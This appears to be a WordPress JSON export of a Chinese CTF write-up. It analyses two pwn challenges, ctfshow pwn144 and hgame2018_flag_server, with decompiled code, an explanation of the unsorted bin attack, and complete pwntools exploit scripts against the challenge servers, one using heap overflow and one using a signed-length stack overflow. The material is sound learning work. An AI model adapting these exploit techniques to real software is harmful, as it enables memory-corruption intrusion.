{"id":608,"date":"2025-09-05T14:25:26","date_gmt":"2025-09-05T06:25:26","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=608"},"modified":"2025-09-05T14:25:27","modified_gmt":"2025-09-05T06:25:27","slug":"ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn144%e3%80%81buuctfhgame2018_flag_server","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2025\/09\/05\/ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn144%e3%80%81buuctfhgame2018_flag_server\/","title":{"rendered":"ctfshow:\u5806\u524d\u7f6epwn144\u3001buuctf:hgame2018_flag_server"},"content":{"rendered":"\n


1\u3001pwn144\u5206\u6790<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u662f\u4e00\u4e2a\u5806\u9898\u7684\u83dc\u5355\uff0c\u5728ida\u91cc\u9762\u4ed4\u7ec6\u8bfb\u8bfb<\/p>\n\n\n\n

main\u51fd\u6570\uff0cida\u6709\u70b9\u8001\u4e86\u563f\u563f\uff0c\u5c06\u5c31\u770b\u5427<\/p>\n\n\n\n

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)\n{\n  int v3; \/\/ eax@2\n  char buf; \/\/ [sp+0h] [bp-10h]@2\n  __int64 v5; \/\/ [sp+8h] [bp-8h]@1\n\n  v5 = *MK_FP(__FS__, 40LL);\/\/\u6808\u6ea2\u51fa\u4fdd\u62a4\n  init(*(_QWORD *)&argc, argv, envp);\n  logo();\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      menu();\n      read(0, &buf, 8uLL);\n      v3 = atoi(&buf);\n      if ( v3 != 3 )\n        break;\n      delete_heap(&buf, &buf);\/\/\u90093\n    }\n    if ( v3 > 3 )\n    {\n      if ( v3 == 4 )\n        exit(0);\/\/\u90094\n      if ( v3 == 114514 )\n      {\n        if ( (unsigned __int64)magic <= 0x1BF52 )\/\/\u8fd9\u91cc\u6bd4\u8f83\u7279\u522b\u5982\u679c\u6211\u4eec\u80fd\u63a7\u5236v3\u7684\u503c\u5e76\u4e14\u8ba9magic>0x1BF52\u5c31\u53ef\u4ee5\u6267\u884c\u540e\u95e8\u51fd\u6570\n        {\n          puts(\"So sad !\");\n        }\n        else\n        {\n          puts(\"Congrt !\");\n          TaT(\"Congrt !\", &buf);\n        }\n      }\n      else\n      {\nLABEL_17:\n        puts(\"Invalid Choice\");\n      }\n    }\n    else if ( v3 == 1 )\n    {\n      create_heap(&buf, &buf);\/\/\u90091\n    }\n    else\n    {\n      if ( v3 != 2 )\n        goto LABEL_17;\n      edit_heap(&buf, &buf);\/\/\u90092\n    }\n  }\n}<\/code><\/pre>\n\n\n\n

\u8fd9\u91cc\u6211\u4eec\u53d1\u73b0\u7a0b\u5e8f\u6709\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5730\u5740\u662ftat=0x400D6D<\/p>\n\n\n\n
magic\u5728\u54ea\u91cc\u5462\uff1f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728bass\u6bb5\uff0c\u5730\u5740\u662fmagic=0x6020A0<\/p>\n\n\n\n
create heap\u51fd\u6570<\/p>\n\n\n\n
__int64 create_heap()\n{\n  signed int i; \/\/ [sp+4h] [bp-1Ch]@1\n  size_t size; \/\/ [sp+8h] [bp-18h]@3\n  char buf; \/\/ [sp+10h] [bp-10h]@3\n  __int64 v4; \/\/ [sp+18h] [bp-8h]@1\n\n  v4 = *MK_FP(__FS__, 40LL);\n  for ( i = 0; i <= 9; ++i )\n  {\n    if ( !heaparray[i] )\n    {\n      printf(\"Size of Heap : \");\n      read(0, &buf, 8uLL);\n      size = atoi(&buf);\n      heaparray[i] = malloc(size);\n      if ( !heaparray[i] )\n      {\n        puts(\"Allocate Error\");\n        exit(2);\n      }\n      printf(\"Content of heap:\", &buf);\n      read_input(heaparray[i], size);\n      puts(\"SuccessFul\");\n      return *MK_FP(__FS__, 40LL) ^ v4;\n    }\n  }\n  return *MK_FP(__FS__, 40LL) ^ v4;\n}<\/code><\/pre>\n\n\n\n

\u5c31\u662f\u521b\u5efa\u5806\u7684\u51fd\u6570\uff0c\u770b\u770bread_input\u51fd\u6570<\/p>\n\n\n\n
ssize_t __fastcall read_input(void *a1, size_t a2)\n{\n  ssize_t result; \/\/ rax@1\n\n  result = read(0, a1, a2);\n  if ( (signed int)result <= 0 )\n  {\n    puts(\"Error\");\n    _exit(-1);\n  }\n  return result;\n}<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
heaparrray[10]\u8fd9\u4e2a\u6570\u7ec4\u4e5f\u662f\u5b58\u5728bass\u6bb5\u54e6<\/p>\n\n\n\n
edit<\/p>\n\n\n\n
__int64 edit_heap()\n{\n  size_t v0; \/\/ ST08_8@6\n  int v2; \/\/ [sp+4h] [bp-1Ch]@1\n  char buf; \/\/ [sp+14h] [bp-Ch]@1\n  __int64 v4; \/\/ [sp+18h] [bp-8h]@1\n\n  v4 = *MK_FP(__FS__, 40LL);\n  printf(\"Index :\");\n  read(0, &buf, 4uLL);\n  v2 = atoi(&buf);\n  if ( v2 < 0 || v2 > 9 )\n  {\n    puts(\"Out of bound!\");\n    _exit(0);\n  }\n  if ( heaparray[v2] )\n  {\n    printf(\"Size of Heap : \", &buf);\n    read(0, &buf, 8uLL);\n    v0 = atoi(&buf);\n    printf(\"Content of heap : \", &buf);\/\/\u770b\u554a\uff0c\u8fd9\u91cc\uff0c\u4ed6\u6ca1\u6709\u4fdd\u62a4\u6b38\uff0c\u5806\u6ea2\u51fa\u6f0f\u6d1e\u54e6\uff01\n    read_input(heaparray[v2], v0);\n    puts(\"Done !\");\n  }\n  else\n  {\n    puts(\"No such heap !\");\n  }\n  return *MK_FP(__FS__, 40LL) ^ v4;\n}<\/code><\/pre>\n\n\n\n

edit_heap\u5b58\u5728\u5806\u6ea2\u51fa\u6f0f\u6d1e<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
delete_heap\u6700\u540efree\u6307\u9488\u7f6e\u96f6\u6ca1\u4ec0\u4e48\u95ee\u9898<\/p>\n\n\n\n
\u73b0\u5728\u5c31\u662f\u7528\u4ec0\u4e48\u653b\u51fb\u65b9\u6cd5\u7684\u95ee\u9898<\/p>\n\n\n\n
\u9996\u5148\u6709\u4e00\u4e2a\u540e\u95e8\u51fd\u6570\u548c\u4e00\u4e2a\u8df3\u8f6c\u5230\u540e\u95e8\u7684\u7279\u6b8a\u70b9magic>0x1BF52<\/p>\n\n\n\n
\u7136\u540e\u5728edit_heap\u91cc\u6709\u5806\u6ea2\u51fa\u6f0f\u6d1e<\/p>\n\n\n\n
\u8fd9\u91cc\u5b66\u5230\u4e00\u4e2a\u653b\u51fb\u624b\u6cd5\u53ebunsorted bin attack\uff0c\u5148\u6765\u770b\u770b\u5229\u7528\u539f\u7406(\u4e00\u4e0b\u5185\u5bb9\u6458\u81eactf-wili\u548ckimi)<\/p>\n\n\n\n
Unsorted Bin Attack \u662f\u4e00\u79cd\u9488\u5bf9 Glibc \u5806\u7ba1\u7406\u673a\u5236\u7684\u653b\u51fb\u65b9\u5f0f\uff0c\u4e3b\u8981\u5229\u7528\u4e86 Glibc \u4e2d\u7684 Unsorted Bin \u7279\u6027\u3002<\/p>\n\n\n\n
1. Unsorted Bin \u7684\u57fa\u672c\u6982\u5ff5<\/p>\n\n\n\n
Unsorted Bin \u662f Glibc \u5806\u7ba1\u7406\u4e2d\u7684\u4e00\u4e2a\u7279\u6b8a\u533a\u57df\uff0c\u7528\u4e8e\u5b58\u50a8\u90a3\u4e9b\u5c1a\u672a\u88ab\u5206\u7c7b\u7684\u81ea\u7531\u5757\uff08free chunk\uff09\u3002\u5f53\u4e00\u4e2a\u5806\u5757\u88ab\u91ca\u653e\u65f6\uff0c\u5982\u679c\u5b83\u4e0d\u5c5e\u4e8e fastbin \u4e14\u4e0d\u4e0e top chunk \u76f8\u90bb\uff0c\u5b83\u4f1a\u88ab\u653e\u5165 Unsorted Bin \u4e2d\u3002<\/p>\n\n\n\n
2. Unsorted Bin Attack \u7684\u539f\u7406<\/p>\n\n\n\n
Unsorted Bin Attack \u7684\u6838\u5fc3\u601d\u60f3\u662f\u901a\u8fc7\u63a7\u5236 Unsorted Bin \u4e2d\u7684 bk \u6307\u9488\uff0c\u5c06\u4e00\u4e2a\u4f2a\u9020\u7684\u5806\u5757\u63d2\u5165\u5230\u76ee\u6807\u5730\u5740\uff0c\u4ece\u800c\u4fee\u6539\u76ee\u6807\u5730\u5740\u7684\u503c\u3002<\/p>\n\n\n\n
\u653b\u51fb\u6b65\u9aa4<\/p>\n\n\n\n
\u5206\u914d\u5806\u5757\uff1a\u9996\u5148\u5206\u914d\u4e00\u4e2a\u5806\u5757\uff0c\u7136\u540e\u91ca\u653e\u5b83\uff0c\u4f7f\u5176\u8fdb\u5165 Unsorted Bin\u3002<\/p>\n\n\n\n
\u4fee\u6539 bk \u6307\u9488\uff1a\u901a\u8fc7\u67d0\u79cd\u6f0f\u6d1e\uff08\u5982\u5806\u6ea2\u51fa\u6216 UAF\uff09\uff0c\u6211\u4eec\u8fd9\u9053\u9898\u5c31\u662f\u8981\u5229\u7528\u5806\u6ea2\u51fa\uff0c\u4fee\u6539\u8be5\u5806\u5757\u7684 bk \u6307\u9488\uff0c\u4f7f\u5176\u6307\u5411\u76ee\u6807\u5730\u5740\u51cf\u53bb\u4e00\u5b9a\u504f\u79fb\u91cf\uff08\u901a\u5e38\u662f 16 \u5b57\u8282\uff09\u3002<\/p>\n\n\n\n
\u89e6\u53d1\u5206\u914d\uff1a\u518d\u6b21\u8c03\u7528 malloc\uff0c\u7a0b\u5e8f\u4f1a\u4ece Unsorted Bin \u4e2d\u53d6\u51fa\u5806\u5757\u3002\u6b64\u65f6\uff0c\u76ee\u6807\u5730\u5740\u4f1a\u88ab\u4fee\u6539\u4e3a Unsorted Bin \u7684\u5934\u90e8\u5730\u5740\u3002<\/p>\n\n\n\n
3. Unsorted Bin Attack \u7684\u5e94\u7528\u573a\u666f<\/p>\n\n\n\n
Unsorted Bin Attack \u4e3b\u8981\u6709\u4e24\u4e2a\u5e94\u7528\u573a\u666f\uff1a<\/p>\n\n\n\n
\u6cc4\u9732\u5730\u5740\uff1a\u901a\u8fc7\u5c06\u5806\u5757\u7684 bk \u6307\u9488\u6307\u5411\u67d0\u4e2a\u5730\u5740\uff0c\u53ef\u4ee5\u5728\u5806\u5757\u88ab\u5206\u914d\u65f6\u6cc4\u9732\u8be5\u5730\u5740\u7684\u503c\u3002<\/p>\n\n\n\n
\u4fee\u6539\u4efb\u610f\u5730\u5740\u7684\u503c\uff1a\u5c06\u5806\u5757\u7684 bk \u6307\u9488\u6307\u5411\u76ee\u6807\u5730\u5740\u51cf\u53bb 16 \u5b57\u8282\uff0c\u53ef\u4ee5\u5728\u5806\u5757\u88ab\u5206\u914d\u65f6\u4fee\u6539\u76ee\u6807\u5730\u5740\u7684\u503c\u3002<\/p>\n\n\n\n
4. \u5e94\u7528\u65b9\u5f0f<\/p>\n\n\n\n
\u4ee5\u4e0b\u662f\u4e00\u4e2a\u5b9e\u9645\u7684\u653b\u51fb\u6d41\u7a0b\u793a\u4f8b\uff1a<\/p>\n\n\n\n
\u5206\u914d\u4e24\u4e2a\u5806\u5757\uff0c\u907f\u514d\u5728\u91ca\u653e\u65f6\u4e0e top chunk \u5408\u5e76\u3002<\/p>\n\n\n\n
\u91ca\u653e\u7b2c\u4e00\u4e2a\u5806\u5757\uff0c\u4f7f\u5176\u8fdb\u5165 Unsorted Bin\u3002<\/p>\n\n\n\n
\u5229\u7528\u6f0f\u6d1e\u4fee\u6539\u7b2c\u4e00\u4e2a\u5806\u5757\u7684 bk \u6307\u9488\uff0c\u4f7f\u5176\u6307\u5411\u76ee\u6807\u5730\u5740\u51cf\u53bb 16 \u5b57\u8282\u3002<\/p>\n\n\n\n
\u518d\u6b21\u8c03\u7528 malloc\uff0c\u7a0b\u5e8f\u4f1a\u4ece Unsorted Bin \u4e2d\u53d6\u51fa\u5806\u5757\uff0c\u76ee\u6807\u5730\u5740\u7684\u503c\u88ab\u4fee\u6539\u4e3a Unsorted Bin \u7684\u5934\u90e8\u5730\u5740\u3002<\/p>\n\n\n\n
\u4e0b\u9762\u5c31\u5f00\u59cb\u5b9e\u64cd<\/p>\n\n\n\n
2\u3001pwn144\u5b9e\u64cd<\/h2>\n\n\n\n
\u8fd9\u91cc\u641c\u4e86\u4e00\u70b9\u5806\u5757\u8bbe\u7f6e\u7684\u77e5\u8bc6\uff1a<\/p>\n\n\n\n
0x80 \u5927\u5c0f\u7684\u5806\u5757<\/p>\n\n\n\n
\u907f\u514d fastbin\uff1a\u5728 Glibc \u7684\u5806\u7ba1\u7406\u4e2d\uff0c\u5c0f\u4e8e 0x80 \u7684\u5806\u5757\u4f1a\u88ab\u653e\u5165 fastbin \u4e2d\u3002fastbin \u662f\u4e00\u79cd\u5feb\u901f\u5206\u914d\u548c\u91ca\u653e\u5c0f\u5757\u5185\u5b58\u7684\u673a\u5236\uff0c\u4f46\u5b83\u5bf9\u5806\u5757\u7684\u7ba1\u7406\u76f8\u5bf9\u7b80\u5355\uff0c\u4e0d\u9002\u5408\u590d\u6742\u7684\u5806\u653b\u51fb\u3002\u901a\u8fc7\u8bbe\u7f6e\u5806\u5757\u5927\u5c0f\u4e3a 0x80\uff0c\u53ef\u4ee5\u786e\u4fdd\u8fd9\u4e9b\u5806\u5757\u4e0d\u4f1a\u8fdb\u5165 fastbin\uff0c\u800c\u662f\u8fdb\u5165\u666e\u901a\u7684\u5806\u7ba1\u7406\u533a\u57df\uff08\u5982 unsorted bin \u6216 small bin\uff09\u3002<\/p>\n\n\n\n
\u5bf9\u9f50\u548c\u8fb9\u754c\uff1a0x80 \u662f\u4e00\u4e2a\u5e38\u89c1\u7684\u5806\u5757\u5927\u5c0f\uff0c\u5b83\u5728\u5185\u5b58\u5bf9\u9f50\u548c\u8fb9\u754c\u68c0\u67e5\u65b9\u9762\u8868\u73b0\u826f\u597d\u3002\u5728 64 \u4f4d\u7cfb\u7edf\u4e2d\uff0c\u5806\u5757\u7684\u5927\u5c0f\u901a\u5e38\u9700\u8981\u662f 16 \u5b57\u8282\u7684\u500d\u6570\uff0c0x80 \u6ee1\u8db3\u8fd9\u4e2a\u8981\u6c42\u3002<\/p>\n\n\n\n
0x20 \u5927\u5c0f\u7684\u5806\u5757<\/p>\n\n\n\n
fastbin \u7684\u8fb9\u754c\uff1a0x20 \u662f\u4e00\u4e2a\u5e38\u89c1\u7684 fastbin \u5927\u5c0f\u3002\u5728 Glibc \u7684\u5806\u7ba1\u7406\u4e2d\uff0cfastbin \u7684\u5927\u5c0f\u8303\u56f4\u662f\u4ece 0x20 \u5230 0x80\uff08\u4e0d\u5305\u62ec 0x80\uff09\u3002\u901a\u8fc7\u8bbe\u7f6e\u5806\u5757\u5927\u5c0f\u4e3a 0x20\uff0c\u53ef\u4ee5\u786e\u4fdd\u8fd9\u4e9b\u5806\u5757\u8fdb\u5165 fastbin\uff0c\u4ece\u800c\u5229\u7528 fastbin \u7684\u7279\u6027\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n
\u63a7\u5236\u5806\u5757\u7684\u5408\u5e76\uff1a\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\uff0c\u8bbe\u7f6e\u5806\u5757\u5927\u5c0f\u4e3a 0x20 \u53ef\u4ee5\u907f\u514d\u5806\u5757\u4e0e top chunk \u5408\u5e76\uff0c\u4ece\u800c\u66f4\u597d\u5730\u63a7\u5236\u5806\u7684\u5e03\u5c40\u3002<\/p>\n\n\n\n
from pwn import *\ncontext.log_level=\"debug\"\np=remote(\"pwn.challenge.ctf.show\",28211)\n\ndef creat_heap(size,content):\n    p.sendlineafter(\"Your choice :\",str(1))\n    p.sendlineafter(\"Size of Heap :\",str(size))\n    p.sendlineafter(\":\",content)\n\ndef edit_heap(index,size,content):\n    p.sendlineafter(\"Your choice :\",str(2))\n    p.sendlineafter(\"Index :\",str(index))\n    p.sendlineafter(\"Size of Heap :\",str(size))\n    p.sendlineafter(\":\",content)\n\ndef delete_heap(index):\n    p.sendlineafter(\"Your choice :\",str(3))\n    p.sendlineafter(\"Index :\",str(index))\n\ncreat_heap(0x80,b'aaaa')#0\ncreat_heap(0x20,b'bbbb')#1\ncreat_heap(0x80,b'cccc')#2\ncreat_heap(0x20,b'dddd')#3\n\ndelete_heap(2)\ndelete_heap(0)#be top_chunk\nmagic=0x6020a0\nfd=0#fake\nbk=magic-0x10\n\npayload=b'a'*0x20+p64(0)+p64(0x91)+p64(fd)+p64(bk)#0x91\u662f\u5b9e\u9645\u5206\u914d\u7684\u5185\u5b58\u53ef\u4ee5\u901a\u8fc7\u8c03\u8bd5\u770b\u5230\nedit_heap(1,0x50,payload)\ncreat_heap(0x80,b'eeee')\np.recvuntil(\":\")\np.sendline(str(114514))\np.interactive()\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

3\u3001hgame2018_flag_server\u5206\u6790<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

32\u4f4dcanary\u548cNX,\u8fd0\u884c\u4e00\u4e0b\uff0c\u662f\u4e2a\u767b\u5f55\u7684\u7a0b\u5e8f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

main\u51fd\u6570<\/p>\n\n\n\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  unsigned int v3; \/\/ eax@13\n  int result; \/\/ eax@20\n  int v5; \/\/ ecx@20\n  int v6; \/\/ [sp+8h] [bp-60h]@6\n  int v7; \/\/ [sp+Ch] [bp-5Ch]@13\n  int i; \/\/ [sp+10h] [bp-58h]@1\n  int v9; \/\/ [sp+14h] [bp-54h]@13\n  char s1; \/\/ [sp+18h] [bp-50h]@12\n  int v11; \/\/ [sp+58h] [bp-10h]@1\n  int v12; \/\/ [sp+5Ch] [bp-Ch]@1\n\n  v12 = *MK_FP(__GS__, 20);\n  init();\n  v11 = 0;\n  printf(\"loading\");\n  for ( i = 0; i >= 0; ++i )\n  {\n    if ( !(i % 100000000) )\n      putchar(46);\n  }\n  puts(\"OK\\n\");\n  v6 = 0;\n  printf(\"your username length: \");\n  __isoc99_scanf(\"%d\", &v6);\n  while ( v6 > 63 || !v6 )\n  {\n    puts(\"sorry,your username is too LOOOOOOOOONG~~\\nplease input again.\\n\");\n    printf(\"your username length: \");\n    while ( getchar() != 10 )\n      ;\n    __isoc99_scanf(\"%d\", &v6);\n  }\n  puts(\"whats your username?\");\n  read_n(&s1, v6);\/\/\u8fd9\u4e2a\u51fd\u6570\u53ef\u4ee5\u5173\u6ce8\u4e00\u4e0b\n  \/\/\u5982\u679c\u7528\u6237\u540d\u662f \"admin\"\uff0c\u7a0b\u5e8f\u4f1a\uff1a\u7528\u5f53\u524d\u65f6\u95f4 time(0) \u4f5c\u4e3a\u79cd\u5b50\u751f\u6210\u968f\u673a\u6570 v9 = rand()\u3002\u8981\u6c42\u4f60\u8f93\u5165\u4e00\u4e2a key\uff0c\u5fc5\u987b\u7b49\u4e8e\u8fd9\u4e2a\u4e0d\u53ef\u9884\u6d4b\u7684\u968f\u673a\u6570\u3002\u5982\u679c\u8f93\u5165\u4e0d\u5bf9\uff0c\u76f4\u63a5\u9000\u51fa\u3002\n  if ( !strcmp(&s1, \"admin\") )\n  {\n    v3 = time(0);\n    srand(v3);\n    v9 = rand();\n    printf(\"hello admin, please input the key: \");\n    __isoc99_scanf(\"%u\", &v7);\n    if ( v7 != v9 )\n    {\n      puts(\"noooo, you are not the TRUE admin!!!\\nwho are you???\");\n      exit(0);\n    }\n    v11 = 1;\n  }\n  printf(\"hello %s, here is what I want to tell you:\", &s1);\n  if ( v11 )\n    system(\"cat flag\");\/\/\u8fd9\u91cc\u5c31\u662f\u540e\u95e8\u4e86\n  else\n    puts(\"\u6fb6\u6c2c\u67ac\u9411\ue15f\u6309\");\n  result = 0;\n  v5 = *MK_FP(__GS__, 20) ^ v12;\n  return result;\n}<\/code><\/pre>\n\n\n\n

read_n\uff1a<\/p>\n\n\n\n
int __cdecl read_n(int a1, int a2)\n{\n  int i; \/\/ [sp+Ch] [bp-Ch]@1\n\n  for ( i = 0; i != a2; ++i )\n  {\n    if ( read(0, (void *)(a1 + i), 1u) != 1 )\n      exit(-1);\n    if ( *(_BYTE *)(a1 + i) == 10 )\n    {\n      *(_BYTE *)(a1 + i) = 0;\n      return i;\n    }\n  }\n  return i;\n}<\/code><\/pre>\n\n\n\n
\u6240\u4ee5\u6211\u4eec\u6700\u540e\u60f3\u62ffflag\u5f97\u4fee\u6539v11,\u600e\u4e48\u4fee\u6539\u5462\uff0c\u5982\u679cv6=-1\u7684\u8bdd\u5c31\u4f1a\u65e0\u9650\u5faa\u73af\u6ce8\u610f\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n
read_n(&s1, v6);\u800cs1\u8ddd\u79bbv11\u662f0x40,\u6211\u4eec\u8f93\u51650x40\u4ee5\u540e\u5c31\u53ef\u4ee5\u4fee\u6539v11<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

4\u3001hgame2018_flag_server\u62ff\u4e2aflag<\/h2>\n\n\n\n
from pwn import *\ncontext.log_level=\"debug\"\np=remote(\"node5.buuoj.cn\",26398)\n\np.sendlineafter(\"your username length:\",str(-1))\npayload=b'a'*(0x40)+p32(1)\np.recvuntil(\"whats your username?\")\np.sendline(payload)\np.interactive()\n~                                                         \n~               <\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
1\u3001pwn144\u5206\u6790 \u662f\u4e00\u4e2a\u5806\u9898\u7684\u83dc\u5355\uff0c\u5728ida\u91cc\u9762\u4ed4\u7ec6\u8bfb\u8bfb main\u51fd\u6570\uff0cida\u6709\u70b9\u8001\u4e86\u563f\u563f\uff0c\u5c06\u5c31\u770b\u5427 \u8fd9\u91cc […]<\/p>\n","protected":false},"author":1,"featured_media":623,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4],"class_list":["post-608","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-pwn"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/608","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=608"}],"version-history":[{"count":1,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/608\/revisions"}],"predecessor-version":[{"id":624,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/608\/revisions\/624"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/623"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=608"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=608"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=608"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}